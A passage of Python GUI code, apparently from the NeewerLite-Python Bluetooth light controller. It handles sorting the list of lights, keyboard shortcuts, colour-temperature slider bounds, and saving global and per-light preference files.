availableLights[a][4], availableLights[a][5], availableLights[a][6], availableLights[a][7], \
availableLights[a][0].name, availableLights[a][0].address, availableLights[a][0].rssi])
else: # we clicked on the "Linked" or "Status" headers, which do not allow sorting
sortingField = -1
if theHeader == 0:
sortDlg = QMessageBox(self)
sortDlg.setIcon(QMessageBox.Question)
sortDlg.setWindowTitle("Sort by...")
sortDlg.setText("Which do you want to sort by?")
sortDlg.addButton(" RSSI (Signal Level) ", QMessageBox.ButtonRole.AcceptRole)
sortDlg.addButton(" Type of Light ", QMessageBox.ButtonRole.AcceptRole)
if checkForCustomNames == True: # if we have custom names available, then add that as an option
sortDlg.addButton("Custom Name", QMessageBox.ButtonRole.AcceptRole)
sortDlg.addButton("Cancel", QMessageBox.ButtonRole.RejectRole)
sortDlg.setIcon(QMessageBox.Warning)
clickedButton = sortDlg.exec_()
if clickedButton == 0:
sortingField = 10 # sort by RSSI
elif clickedButton == 1:
sortingField = 8 # sort by type of light
elif clickedButton == 2:
if checkForCustomNames == True: # if the option was available for custom names, this is "custom name"
sortingField = 2
else: # if the option wasn't available, then this is "cancel"
sortingField = -1 # cancel out of sorting - write this!
elif clickedButton == 3: # this option is only available if custom names is accessible - if so, this is "cancel"
sortingField = -1 # cancel out of sorting - write this!
elif theHeader == 1: # sort by MAC Address/GUID
sortingField = 9
if sortingField != -1: # we want to sort
self.lightTable.horizontalHeader().setSortIndicatorShown(True) # show the sorting indicator
if lastSortingField != sortingField: # if we're doing a different kind of sort than the last one
self.lightTable.horizontalHeader().setSortIndicator(theHeader, Qt.SortOrder.AscendingOrder) # force the header to "Ascending" order
if sortingField != 10: # if we're not looking at RSSI
doReverseSort = False # we need an ascending order search
else: # we ARE looking at RSSI
doReverseSort = True # if we're looking at RSSI, then the search order is reversed (as the smaller # is actually the higher value)
else: # if it's the same as before, then take the cue from the last order
if self.lightTable.horizontalHeader().sortIndicatorOrder() == Qt.SortOrder.DescendingOrder:
if sortingField != 10:
doReverseSort = True
else:
doReverseSort = False
elif self.lightTable.horizontalHeader().sortIndicatorOrder() == Qt.SortOrder.AscendingOrder:
if sortingField != 10:
doReverseSort = False
else:
doReverseSort = True
sortedList = sorted(sortingList, key = lambda x: x[sortingField], reverse = doReverseSort) # sort the list
availableLights.clear() # clear the list of available lights
for a in range(len(sortedList)): # rebuild the available lights list from the sorted list
availableLights.append([sortedList[a][0], sortedList[a][1], sortedList[a][2], sortedList[a][3], \
sortedList[a][4], sortedList[a][5], sortedList[a][6], sortedList[a][7]])
self.updateLights(False) # redraw the table with the new light list
lastSortingField = sortingField # keep track of the last field used for sorting, so we know whether or not to switch to ascending
else:
self.lightTable.horizontalHeader().setSortIndicatorShown(False) # hide the sorting indicator
def switchToTab(self, theTab): # SWITCH TO THE REQUESTED TAB **IF IT IS AVAILABLE**
if self.ColorModeTabWidget.isTabEnabled(theTab) == True:
self.ColorModeTabWidget.setCurrentIndex(theTab)
def numberShortcuts(self, theNumber):
# THE KEYS (IF THERE AREN'T CUSTOM ONES SET UP):
# 7 AND 9 ADJUST THE FIRST SLIDER ON A TAB
# 4 AND 6 ADJUST THE SECOND SLIDER ON A TAB
# 1 AND 3 ADJUST THE THIRD SLIDER ON A TAB
# UNLESS WE'RE IN SCENE MODE, THEN THEY JUST SWITCH THE SCENE
if theNumber == 1:
if self.ColorModeTabWidget.currentIndex() == 2: # if we're on the SCENE tab, then the number keys correspond to an animation
self.computeValueANM(1)
else: # if we're not, adjust the slider
if customKeys[16] == "1":
self.changeSliderValue(3, -1) # decrement slider 3
elif theNumber == 2:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(2)
elif theNumber == 3:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(3)
else:
if customKeys[17] == "3":
self.changeSliderValue(3, 1) # increment slider 3
elif theNumber == 4:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(4)
else:
if customKeys[14] == "4":
self.changeSliderValue(2, -1) # decrement slider 2
elif theNumber == 5:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(5)
elif theNumber == 6:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(6)
else:
if customKeys[15] == "6":
self.changeSliderValue(2, 1) # increment slider 2
elif theNumber == 7:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(7)
else:
if customKeys[12] == "7":
self.changeSliderValue(1, -1) # decrement slider 1
elif theNumber == 8:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(8)
elif theNumber == 9:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(9)
else:
if customKeys[13] == "9":
self.changeSliderValue(1, 1) # increment slider 1
def changeSliderValue(self, sliderToChange, changeAmt):
if self.ColorModeTabWidget.currentIndex() == 0: # we have 2 sliders in CCT mode
if sliderToChange == 1:
self.Slider_CCT_Hue.setValue(self.Slider_CCT_Hue.value() + changeAmt)
elif sliderToChange == 2 or sliderToChange == 0:
self.Slider_CCT_Bright.setValue(self.Slider_CCT_Bright.value() + changeAmt)
elif self.ColorModeTabWidget.currentIndex() == 1: # we have 3 sliders in HSI mode
if sliderToChange == 1:
self.Slider_HSI_1_H.setValue(self.Slider_HSI_1_H.value() + changeAmt)
elif sliderToChange == 2:
self.Slider_HSI_2_S.setValue(self.Slider_HSI_2_S.value() + changeAmt)
elif sliderToChange == 3 or sliderToChange == 0:
self.Slider_HSI_3_L.setValue(self.Slider_HSI_3_L.value() + changeAmt)
elif self.ColorModeTabWidget.currentIndex() == 2:
if sliderToChange == 0: # the only "slider" in SCENE mode is the brightness
self.Slider_ANM_Brightness.setValue(self.Slider_ANM_Brightness.value() + changeAmt)
def checkLightTab(self, selectedLight = -1):
if self.ColorModeTabWidget.currentIndex() == 0: # if we're on the CCT tab, do the check
if selectedLight == -1: # if we don't have a light selected
self.setupCCTBounds(56) # restore the bounds to their default of 56(00)K
else:
if availableLights[selectedLight][4] == True: # if we're supposed to be extending the range
if self.Slider_CCT_Hue.maximum() == 56: # if we're set to extend the range, but we're still set to 56(00)K, then change the range
self.setupCCTBounds(85)
else:
if self.Slider_CCT_Hue.maximum() == 85: # if we're set to NOT extend the range, but we're still set to 85(00)K, then reduce the range
self.setupCCTBounds(56)
elif self.ColorModeTabWidget.currentIndex() == 3: # if we're on the Preferences tab instead
if selectedLight != -1: # if there is a specific selected light
self.setupLightPrefsTab(selectedLight) # update the Prefs tab with the information for that selected light
def setupCCTBounds(self, gradientBounds):
self.Slider_CCT_Hue.setMaximum(gradientBounds) # set the max value of the color temperature slider to the new max bounds
gradient = QLinearGradient(0, 0, 532, 31)
# SET GRADIENT OF CCT SLIDER IN CHUNKS OF 5 VALUES BASED ON BOUNDARY
if gradientBounds == 56: # the color temperature boundary is 5600K
gradient.setColorAt(0.0, QColor(255, 187, 120, 255)) # 3200K
gradient.setColorAt(0.25, QColor(255, 204, 153, 255)) # 3800K
gradient.setColorAt(0.50, QColor(255, 217, 182, 255)) # 4400K
gradient.setColorAt(0.75, QColor(255, 228, 206, 255)) # 5000K
gradient.setColorAt(1.0, QColor(255, 238, 227, 255)) # 5600K
else: # the color temperature boundary is 8500K
gradient.setColorAt(0.0, QColor(255, 187, 120, 255)) # 3200K
gradient.setColorAt(0.25, QColor(255, 219, 186, 255)) # 4500K
gradient.setColorAt(0.50, QColor(255, 240, 233, 255)) # 5800K
gradient.setColorAt(0.75, QColor(243, 242, 255, 255)) # 7100K
gradient.setColorAt(1.0, QColor(220, 229, 255, 255)) # 8500K
self.CCT_Temp_Gradient_BG.scene().setBackgroundBrush(gradient) # change the gradient to fit the new boundary
def setupLightPrefsTab(self, selectedLight):
self.customNameTF.setText(availableLights[selectedLight][2]) # set the "custom name" field to the custom name of this light
# IF THE OPTION TO ALLOW WIDER COLOR TEMPERATURES IS ENABLED, THEN ENABLE THAT CHECKBOX
if availableLights[selectedLight][4] == True:
self.widerRangeCheck.setChecked(True)
else:
self.widerRangeCheck.setChecked(False)
# IF THE OPTION TO SEND ONLY CCT MODE IS ENABLED, THEN ENABLE THAT CHECKBOX
if availableLights[selectedLight][5] == True:
self.onlyCCTModeCheck.setChecked(True)
else:
self.onlyCCTModeCheck.setChecked(False)
def setupGlobalLightPrefsTab(self, setDefault=False):
if setDefault == False:
self.findLightsOnStartup_check.setChecked(findLightsOnStartup)
self.autoConnectToLights_check.setChecked(autoConnectToLights)
self.printDebug_check.setChecked(printDebug)
self.rememberLightsOnExit_check.setChecked(rememberLightsOnExit)
self.rememberPresetsOnExit_check.setChecked(rememberPresetsOnExit)
self.maxNumOfAttempts_field.setText(str(maxNumOfAttempts))
self.acceptable_HTTP_IPs_field.setText("\n".join(acceptable_HTTP_IPs))
self.whiteListedMACs_field.setText("\n".join(whiteListedMACs))
self.SC_turnOffButton_field.setKeySequence(customKeys[0])
self.SC_turnOnButton_field.setKeySequence(customKeys[1])
self.SC_scanCommandButton_field.setKeySequence(customKeys[2])
self.SC_tryConnectButton_field.setKeySequence(customKeys[3])
self.SC_Tab_CCT_field.setKeySequence(customKeys[4])
self.SC_Tab_HSI_field.setKeySequence(customKeys[5])
self.SC_Tab_SCENE_field.setKeySequence(customKeys[6])
self.SC_Tab_PREFS_field.setKeySequence(customKeys[7])
self.SC_Dec_Bri_Small_field.setKeySequence(customKeys[8])
self.SC_Inc_Bri_Small_field.setKeySequence(customKeys[9])
self.SC_Dec_Bri_Large_field.setKeySequence(customKeys[10])
self.SC_Inc_Bri_Large_field.setKeySequence(customKeys[11])
self.SC_Dec_1_Small_field.setKeySequence(customKeys[12])
self.SC_Inc_1_Small_field.setKeySequence(customKeys[13])
self.SC_Dec_2_Small_field.setKeySequence(customKeys[14])
self.SC_Inc_2_Small_field.setKeySequence(customKeys[15])
self.SC_Dec_3_Small_field.setKeySequence(customKeys[16])
self.SC_Inc_3_Small_field.setKeySequence(customKeys[17])
self.SC_Dec_1_Large_field.setKeySequence(customKeys[18])
self.SC_Inc_1_Large_field.setKeySequence(customKeys[19])
self.SC_Dec_2_Large_field.setKeySequence(customKeys[20])
self.SC_Inc_2_Large_field.setKeySequence(customKeys[21])
self.SC_Dec_3_Large_field.setKeySequence(customKeys[22])
self.SC_Inc_3_Large_field.setKeySequence(customKeys[23])
else: # if you clicked the RESET button, reset all preference values to their defaults
self.findLightsOnStartup_check.setChecked(True)
self.autoConnectToLights_check.setChecked(True)
self.printDebug_check.setChecked(True)
self.rememberLightsOnExit_check.setChecked(False)
self.rememberPresetsOnExit_check.setChecked(True)
self.maxNumOfAttempts_field.setText("6")
self.acceptable_HTTP_IPs_field.setText("\n".join(["127.0.0.1", "192.168", "10.0.0"]))
self.whiteListedMACs_field.setText("")
self.SC_turnOffButton_field.setKeySequence("Ctrl+PgDown")
self.SC_turnOnButton_field.setKeySequence("Ctrl+PgUp")
self.SC_scanCommandButton_field.setKeySequence("Ctrl+Shift+S")
self.SC_tryConnectButton_field.setKeySequence("Ctrl+Shift+C")
self.SC_Tab_CCT_field.setKeySequence("Alt+1")
self.SC_Tab_HSI_field.setKeySequence("Alt+2")
self.SC_Tab_SCENE_field.setKeySequence("Alt+3")
self.SC_Tab_PREFS_field.setKeySequence("Alt+4")
self.SC_Dec_Bri_Small_field.setKeySequence("/")
self.SC_Inc_Bri_Small_field.setKeySequence("*")
self.SC_Dec_Bri_Large_field.setKeySequence("Ctrl+/")
self.SC_Inc_Bri_Large_field.setKeySequence("Ctrl+*")
self.SC_Dec_1_Small_field.setKeySequence("7")
self.SC_Inc_1_Small_field.setKeySequence("9")
self.SC_Dec_2_Small_field.setKeySequence("4")
self.SC_Inc_2_Small_field.setKeySequence("6")
self.SC_Dec_3_Small_field.setKeySequence("1")
self.SC_Inc_3_Small_field.setKeySequence("3")
self.SC_Dec_1_Large_field.setKeySequence("Ctrl+7")
self.SC_Inc_1_Large_field.setKeySequence("Ctrl+9")
self.SC_Dec_2_Large_field.setKeySequence("Ctrl+4")
self.SC_Inc_2_Large_field.setKeySequence("Ctrl+6")
self.SC_Dec_3_Large_field.setKeySequence("Ctrl+1")
self.SC_Inc_3_Large_field.setKeySequence("Ctrl+3")
def saveGlobalPrefs(self):
# change these global values to the new values in Prefs
            global customKeys, findLightsOnStartup, autoConnectToLights, printDebug, rememberLightsOnExit, rememberPresetsOnExit, maxNumOfAttempts, acceptable_HTTP_IPs, whiteListedMACs
            finalPrefs = [] # list of final prefs to merge together at the end
            if not self.findLightsOnStartup_check.isChecked(): # this option is usually on, so only add on false
                findLightsOnStartup = False
                finalPrefs.append("findLightsOnStartup=0")
            else:
                findLightsOnStartup = True
if not self.autoConnectToLights_check.isChecked(): # this option is usually on, so only add on false
autoConnectToLights = False
finalPrefs.append("autoConnectToLights=0")
else:
autoConnectToLights = True
if not self.printDebug_check.isChecked(): # this option is usually on, so only add on false
printDebug = False
finalPrefs.append("printDebug=0")
else:
printDebug = True
if self.rememberLightsOnExit_check.isChecked(): # this option is usually off, so only add on true
rememberLightsOnExit = True
finalPrefs.append("rememberLightsOnExit=1")
else:
rememberLightsOnExit = False
if not self.rememberPresetsOnExit_check.isChecked(): # this option is usually on, so only add if false
rememberPresetsOnExit = False
finalPrefs.append("rememberPresetsOnExit=0")
else:
rememberPresetsOnExit = True
if self.maxNumOfAttempts_field.text() != "6": # the default for this option is 6 attempts
maxNumOfAttempts = int(self.maxNumOfAttempts_field.text())
finalPrefs.append("maxNumOfAttempts=" + self.maxNumOfAttempts_field.text())
else:
maxNumOfAttempts = 6
# FIGURE OUT IF THE HTTP IP ADDRESSES HAVE CHANGED
returnedList_HTTP_IPs = self.acceptable_HTTP_IPs_field.toPlainText().split("\n")
if returnedList_HTTP_IPs != ["127.0.0.1", "192.168", "10.0.0"]: # if the list of HTTP IPs have changed
acceptable_HTTP_IPs = returnedList_HTTP_IPs # change the global HTTP IPs available
finalPrefs.append("acceptable_HTTP_IPs=" + ";".join(acceptable_HTTP_IPs)) # add the new ones to the preferences
else:
acceptable_HTTP_IPs = ["127.0.0.1", "192.168", "10.0.0"] # if we reset the IPs, then re-reset the parameter
# ADD WHITELISTED LIGHTS TO PREFERENCES IF THEY EXIST
returnedList_whiteListedMACs = self.whiteListedMACs_field.toPlainText().replace(" ", "").split("\n") # remove spaces and split on newlines
if returnedList_whiteListedMACs[0] != "": # if we have any MAC addresses specified
whiteListedMACs = returnedList_whiteListedMACs # then set the list to the addresses specified
finalPrefs.append("whiteListedMACs=" + ";".join(whiteListedMACs)) # add the new addresses to the preferences
else:
whiteListedMACs = [] # or clear the list
# SET THE NEW KEYBOARD SHORTCUTS TO THE VALUES IN PREFERENCES
customKeys[0] = self.SC_turnOffButton_field.keySequence().toString()
customKeys[1] = self.SC_turnOnButton_field.keySequence().toString()
customKeys[2] = self.SC_scanCommandButton_field.keySequence().toString()
customKeys[3] = self.SC_tryConnectButton_field.keySequence().toString()
customKeys[4] = self.SC_Tab_CCT_field.keySequence().toString()
customKeys[5] = self.SC_Tab_HSI_field.keySequence().toString()
customKeys[6] = self.SC_Tab_SCENE_field.keySequence().toString()
customKeys[7] = self.SC_Tab_PREFS_field.keySequence().toString()
customKeys[8] = self.SC_Dec_Bri_Small_field.keySequence().toString()
customKeys[9] = self.SC_Inc_Bri_Small_field.keySequence().toString()
customKeys[10] = self.SC_Dec_Bri_Large_field.keySequence().toString()
customKeys[11] = self.SC_Inc_Bri_Large_field.keySequence().toString()
customKeys[12] = self.SC_Dec_1_Small_field.keySequence().toString()
customKeys[13] = self.SC_Inc_1_Small_field.keySequence().toString()
customKeys[14] = self.SC_Dec_2_Small_field.keySequence().toString()
customKeys[15] = self.SC_Inc_2_Small_field.keySequence().toString()
customKeys[16] = self.SC_Dec_3_Small_field.keySequence().toString()
customKeys[17] = self.SC_Inc_3_Small_field.keySequence().toString()
customKeys[18] = self.SC_Dec_1_Large_field.keySequence().toString()
customKeys[19] = self.SC_Inc_1_Large_field.keySequence().toString()
customKeys[20] = self.SC_Dec_2_Large_field.keySequence().toString()
customKeys[21] = self.SC_Inc_2_Large_field.keySequence().toString()
customKeys[22] = self.SC_Dec_3_Large_field.keySequence().toString()
customKeys[23] = self.SC_Inc_3_Large_field.keySequence().toString()
self.setupShortcutKeys() # change shortcut key assignments to the new values in prefs
if customKeys[0] != "Ctrl+PgDown":
finalPrefs.append("SC_turnOffButton=" + customKeys[0])
if customKeys[1] != "Ctrl+PgUp":
finalPrefs.append("SC_turnOnButton=" + customKeys[1])
if customKeys[2] != "Ctrl+Shift+S":
finalPrefs.append("SC_scanCommandButton=" + customKeys[2])
if customKeys[3] != "Ctrl+Shift+C":
finalPrefs.append("SC_tryConnectButton=" + customKeys[3])
if customKeys[4] != "Alt+1":
finalPrefs.append("SC_Tab_CCT=" + customKeys[4])
if customKeys[5] != "Alt+2":
finalPrefs.append("SC_Tab_HSI=" + customKeys[5])
if customKeys[6] != "Alt+3":
finalPrefs.append("SC_Tab_SCENE=" + customKeys[6])
if customKeys[7] != "Alt+4":
finalPrefs.append("SC_Tab_PREFS=" + customKeys[7])
if customKeys[8] != "/":
finalPrefs.append("SC_Dec_Bri_Small=" + customKeys[8])
if customKeys[9] != "*":
finalPrefs.append("SC_Inc_Bri_Small=" + customKeys[9])
if customKeys[10] != "Ctrl+/":
finalPrefs.append("SC_Dec_Bri_Large=" + customKeys[10])
if customKeys[11] != "Ctrl+*":
finalPrefs.append("SC_Inc_Bri_Large=" + customKeys[11])
if customKeys[12] != "7":
finalPrefs.append("SC_Dec_1_Small=" + customKeys[12])
if customKeys[13] != "9":
finalPrefs.append("SC_Inc_1_Small=" + customKeys[13])
if customKeys[14] != "4":
finalPrefs.append("SC_Dec_2_Small=" + customKeys[14])
if customKeys[15] != "6":
finalPrefs.append("SC_Inc_2_Small=" + customKeys[15])
if customKeys[16] != "1":
finalPrefs.append("SC_Dec_3_Small=" + customKeys[16])
if customKeys[17] != "3":
finalPrefs.append("SC_Inc_3_Small=" + customKeys[17])
if customKeys[18] != "Ctrl+7":
finalPrefs.append("SC_Dec_1_Large=" + customKeys[18])
if customKeys[19] != "Ctrl+9":
finalPrefs.append("SC_Inc_1_Large=" + customKeys[19])
if customKeys[20] != "Ctrl+4":
finalPrefs.append("SC_Dec_2_Large=" + customKeys[20])
if customKeys[21] != "Ctrl+6":
finalPrefs.append("SC_Inc_2_Large=" + customKeys[21])
if customKeys[22] != "Ctrl+1":
finalPrefs.append("SC_Dec_3_Large=" + customKeys[22])
if customKeys[23] != "Ctrl+3":
finalPrefs.append("SC_Inc_3_Large=" + customKeys[23])
# CARRY "HIDDEN" DEBUGGING OPTIONS TO PREFERENCES FILE
if enableTabsOnLaunch == True:
finalPrefs.append("enableTabsOnLaunch=1")
if len(finalPrefs) > 0: # if we actually have preferences to save...
with open(globalPrefsFile, "w") as prefsFileToWrite:
prefsFileToWrite.write(("\n").join(finalPrefs)) # then write them to the prefs file
# PRINT THIS INFORMATION WHETHER DEBUG OUTPUT IS TURNED ON OR NOT
print("New global preferences saved in " + globalPrefsFile + " - here is the list:")
for a in range(len(finalPrefs)):
print(" > " + finalPrefs[a]) # iterate through the list of preferences and show the new value(s) you set
else: # there are no preferences to save, so clean up the file (if it exists)
print("There are no preferences to save (all preferences are currently set to their default values).")
if os.path.exists(globalPrefsFile): # if a previous preferences file exists
print("Since all preferences are set to their defaults, we are deleting the NeewerLite-Python.prefs file.")
os.remove(globalPrefsFile) # ...delete it!
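# NOTE: the global prefs file saved above is plain text with one "key=value" pair per line, and only
# settings that differ from their defaults are written - e.g. a remapped shortcut would be stored as
# "SC_Tab_CCT=<key sequence>" (hypothetical example), while default-valued settings are simply omitted.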
def setupShortcutKeys(self):
self.SC_turnOffButton.setKey(QKeySequence(customKeys[0]))
self.SC_turnOnButton.setKey(QKeySequence(customKeys[1]))
self.SC_scanCommandButton.setKey(QKeySequence(customKeys[2]))
self.SC_tryConnectButton.setKey(QKeySequence(customKeys[3]))
self.SC_Tab_CCT.setKey(QKeySequence(customKeys[4]))
self.SC_Tab_HSI.setKey(QKeySequence(customKeys[5]))
self.SC_Tab_SCENE.setKey(QKeySequence(customKeys[6]))
self.SC_Tab_PREFS.setKey(QKeySequence(customKeys[7]))
self.SC_Dec_Bri_Small.setKey(QKeySequence(customKeys[8]))
self.SC_Inc_Bri_Small.setKey(QKeySequence(customKeys[9]))
self.SC_Dec_Bri_Large.setKey(QKeySequence(customKeys[10]))
self.SC_Inc_Bri_Large.setKey(QKeySequence(customKeys[11]))
# IF THERE ARE CUSTOM KEYS SET UP FOR THE SMALL INCREMENTS, SET THEM HERE (AS THE NUMPAD KEYS WILL BE TAKEN AWAY IN THAT INSTANCE):
if customKeys[12] != "7":
self.SC_Dec_1_Small.setKey(QKeySequence(customKeys[12]))
else: # if we changed back to default, clear the key assignment if there was one before
self.SC_Dec_1_Small.setKey("")
if customKeys[13] != "9":
self.SC_Inc_1_Small.setKey(QKeySequence(customKeys[13]))
else:
self.SC_Inc_1_Small.setKey("")
if customKeys[14] != "4":
self.SC_Dec_2_Small.setKey(QKeySequence(customKeys[14]))
else:
self.SC_Dec_2_Small.setKey("")
if customKeys[15] != "6":
self.SC_Inc_2_Small.setKey(QKeySequence(customKeys[15]))
else:
self.SC_Inc_2_Small.setKey("")
if customKeys[16] != "1":
self.SC_Dec_3_Small.setKey(QKeySequence(customKeys[16]))
else:
self.SC_Dec_3_Small.setKey("")
if customKeys[17] != "3":
self.SC_Inc_3_Small.setKey(QKeySequence(customKeys[17]))
else:
self.SC_Inc_3_Small.setKey("")
self.SC_Dec_1_Large.setKey(QKeySequence(customKeys[18]))
self.SC_Inc_1_Large.setKey(QKeySequence(customKeys[19]))
self.SC_Dec_2_Large.setKey(QKeySequence(customKeys[20]))
self.SC_Inc_2_Large.setKey(QKeySequence(customKeys[21]))
self.SC_Dec_3_Large.setKey(QKeySequence(customKeys[22]))
self.SC_Inc_3_Large.setKey(QKeySequence(customKeys[23]))
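# QUICK REFERENCE (derived from how the list is used below): each entry in availableLights holds
# [0] the Bleak device object (name/address/rssi), [1] the Bleak client connection ("" if not linked yet),
# [2] the custom name, [3] the last sent parameters (bytestring list), [4] the "wider CCT range" flag,
# [5] the "CCT mode only" flag, [6] whether the light is currently turned on, and [7] a two-slot
# placeholder (initialized to ["---", "---"]) used elsewhere in the program.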
# CHECK TO SEE WHETHER OR NOT TO ENABLE/DISABLE THE "Connect" BUTTON OR CHANGE THE PREFS TAB
def selectionChanged(self):
selectedRows = self.selectedLights() # get the list of currently selected lights
if len(selectedRows) > 0: # if we have a selection
self.tryConnectButton.setEnabled(True) # if we have light(s) selected in the table, then enable the "Connect" button
if len(selectedRows) == 1: # we have exactly one light selected
self.ColorModeTabWidget.setTabEnabled(3, True) # enable the "Preferences" tab for this light
# SWITCH THE TURN ON/OFF BUTTONS ON, AND CHANGE TEXT TO SINGLE BUTTON TEXT
self.turnOffButton.setText("Turn Light Off")
self.turnOffButton.setEnabled(True)
self.turnOnButton.setText("Turn Light On")
self.turnOnButton.setEnabled(True)
self.ColorModeTabWidget.setTabEnabled(0, True)
if availableLights[selectedRows[0]][5] == True: # if this light is CCT only, then disable the HSI and ANM tabs
self.ColorModeTabWidget.setTabEnabled(1, False) # disable the HSI mode tab
self.ColorModeTabWidget.setTabEnabled(2, False) # disable the ANM/SCENE tab
else: # we can use HSI and ANM/SCENE modes, so enable those tabs
self.ColorModeTabWidget.setTabEnabled(1, True) # enable the HSI mode tab
self.ColorModeTabWidget.setTabEnabled(2, True) # enable the ANM/SCENE tab
currentlySelectedRow = selectedRows[0] # get the row index of the 1 selected item
self.checkLightTab(currentlySelectedRow) # on the CCT tab, check whether this light can use extended values; on the Prefs tab, refresh the Prefs display
# RECALL LAST SENT SETTING FOR THIS PARTICULAR LIGHT, IF A SETTING EXISTS
if availableLights[currentlySelectedRow][3] != []: # if the last set parameters aren't empty
if availableLights[currentlySelectedRow][6] != False: # if the light is listed as being turned ON
sendValue = availableLights[currentlySelectedRow][3] # make the current "sendValue" the last set parameter so it doesn't re-send it on re-load
if sendValue[1] == 135: # the last parameter was a CCT mode change
self.setUpGUI(colorMode="CCT",
brightness=sendValue[3],
temp=sendValue[4])
elif sendValue[1] == 134: # the last parameter was a HSI mode change
self.setUpGUI(colorMode="HSI",
hue=sendValue[3] + (256 * sendValue[4]),
sat=sendValue[5],
brightness=sendValue[6])
elif sendValue[1] == 136: # the last parameter was a ANM/SCENE mode change
self.setUpGUI(colorMode="ANM",
brightness=sendValue[3],
scene=sendValue[4])
else:
self.ColorModeTabWidget.setCurrentIndex(0) # switch to the CCT tab if the light is off and there ARE prior parameters
else:
self.ColorModeTabWidget.setCurrentIndex(0) # switch to the CCT tab if there are no prior parameters
else: # we have multiple lights selected
# SWITCH THE TURN ON/OFF BUTTONS ON, AND CHANGE TEXT TO MULTIPLE LIGHTS TEXT
self.turnOffButton.setText("Turn Light(s) Off")
self.turnOffButton.setEnabled(True)
self.turnOnButton.setText("Turn Light(s) On")
self.turnOnButton.setEnabled(True)
self.ColorModeTabWidget.setTabEnabled(0, True)
self.ColorModeTabWidget.setTabEnabled(1, True) # enable the "HSI" mode tab
self.ColorModeTabWidget.setTabEnabled(2, True) # enable the "ANM/SCENE" mode tab
self.ColorModeTabWidget.setTabEnabled(3, False) # disable the "Preferences" tab, as we have multiple lights selected
else: # the selection has been cleared or there are no lights to select
currentTab = self.ColorModeTabWidget.currentIndex() # get the currently selected tab (so when we disable the tabs, we stick on the current one)
self.tryConnectButton.setEnabled(False) # if we have no lights selected, disable the Connect button
# SWITCH THE TURN ON/OFF BUTTONS OFF, AND CHANGE TEXT TO GENERIC TEXT
self.turnOffButton.setText("Turn Light(s) Off")
self.turnOffButton.setEnabled(False)
self.turnOnButton.setText("Turn Light(s) On")
self.turnOnButton.setEnabled(False)
self.ColorModeTabWidget.setTabEnabled(0, False) # disable the "CCT" mode tab
self.ColorModeTabWidget.setTabEnabled(1, False) # disable the "HSI" mode tab
self.ColorModeTabWidget.setTabEnabled(2, False) # disable the "ANM/SCENE" mode tab
self.ColorModeTabWidget.setTabEnabled(3, False) # disable the "Preferences" tab, as we have no lights selected
if currentTab != 3:
self.ColorModeTabWidget.setCurrentIndex(currentTab) # disable the tabs, but don't switch the current one shown
else:
self.ColorModeTabWidget.setCurrentIndex(0) # if we're on Prefs, then switch to the CCT tab
self.checkLightTab() # check to see if we're on the CCT tab - if we are, then restore order
def checkLightPrefs(self): # check the new settings and save the custom file
selectedRows = self.selectedLights() # get the list of currently selected lights
if len(selectedRows) == 1: # if we have 1 selected light - which should never be false, as we can't use Prefs with more than 1
availableLights[selectedRows[0]][2] = self.customNameTF.text() # set this light's custom name to the text box
availableLights[selectedRows[0]][4] = self.widerRangeCheck.isChecked() # if the "wider range" box is checked, then allow wider ranges
availableLights[selectedRows[0]][5] = self.onlyCCTModeCheck.isChecked() # if the "CCT mode only" box is checked, flag this light as CCT-only (its brightness and hue/temperature get sent as separate packets)
# IF A CUSTOM NAME IS SET UP FOR THIS LIGHT, THEN CHANGE THE TABLE TO REFLECT THAT
if availableLights[selectedRows[0]][2] != "":
self.setTheTable([availableLights[selectedRows[0]][2] + " (" + availableLights[selectedRows[0]][0].name + ")" + "\n [ʀssɪ: " + str(availableLights[selectedRows[0]][0].rssi) + " dBm]",
"", "", ""], selectedRows[0])
else: # if there is no custom name, then reset the table to show that
self.setTheTable([availableLights[selectedRows[0]][0].name + "\n [ʀssɪ: " + str(availableLights[selectedRows[0]][0].rssi) + " dBm]",
"", "", ""], selectedRows[0])
self.saveLightPrefs(selectedRows[0]) # save the light settings to a special file
def saveLightPrefs(self, lightID): # save a sidecar file with the preferences for a specific light
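# The sidecar file is a single pipe-delimited line: customName|widerRange|onlyCCTMode, optionally followed
# by |lastSetParams when rememberLightsOnExit is on - for example (hypothetical light name):
#   My Key Light|True|False|120,135,2,100,56,157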
createLightPrefsFolder() # create the light_prefs folder if it doesn't exist
# GET THE CUSTOM FILENAME FOR THIS FILE, NOTED FROM THE MAC ADDRESS OF THE CURRENT LIGHT
exportFileName = availableLights[lightID][0].address.split(":") # take the colons out of the MAC address
exportFileName = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "".join(exportFileName)
customName = availableLights[lightID][2] # the custom name for this light
widerRange = str(availableLights[lightID][4]) # whether or not the light can use extended CCT ranges
onlyCCTMode = str(availableLights[lightID][5]) # whether or not the light can only use CCT mode
exportString = customName + "|" + widerRange + "|" + onlyCCTMode # the exported string, minus the light last set parameters
if rememberLightsOnExit == True: # if we're supposed to remember the last settings, then add that to the Prefs file
if len(availableLights[lightID][3]) > 0: # if we actually have a value stored for this light
lastSettingsString = ",".join(map(str, availableLights[lightID][3])) # combine all the elements of the last set params
exportString += "|" + lastSettingsString # add it to the exported string
else: # if we don't have a value stored for this light (nothing has changed yet)
exportString += "|" + "120,135,2,100,56,157" # then just give the default (CCT, 5600K, 100%) params
# WRITE THE PREFERENCES FILE
with open(exportFileName, "w") as prefsFileToWrite:
prefsFileToWrite.write(exportString)
if customName != "":
printDebugString("Exported preferences for " + customName + " [" + availableLights[lightID][0].name + "] to " + exportFileName)
else:
printDebugString("Exported preferences for [" + availableLights[lightID][0].name + "] to " + exportFileName)
# ADD A LIGHT TO THE TABLE VIEW
def setTheTable(self, infoArray, rowToChange = -1):
if rowToChange == -1:
currentRow = self.lightTable.rowCount()
self.lightTable.insertRow(currentRow) # if rowToChange is not specified, then we'll make a new row at the end
self.lightTable.setItem(currentRow, 0, QTableWidgetItem())
self.lightTable.setItem(currentRow, 1, QTableWidgetItem())
self.lightTable.setItem(currentRow, 2, QTableWidgetItem())
self.lightTable.setItem(currentRow, 3, QTableWidgetItem())
else:
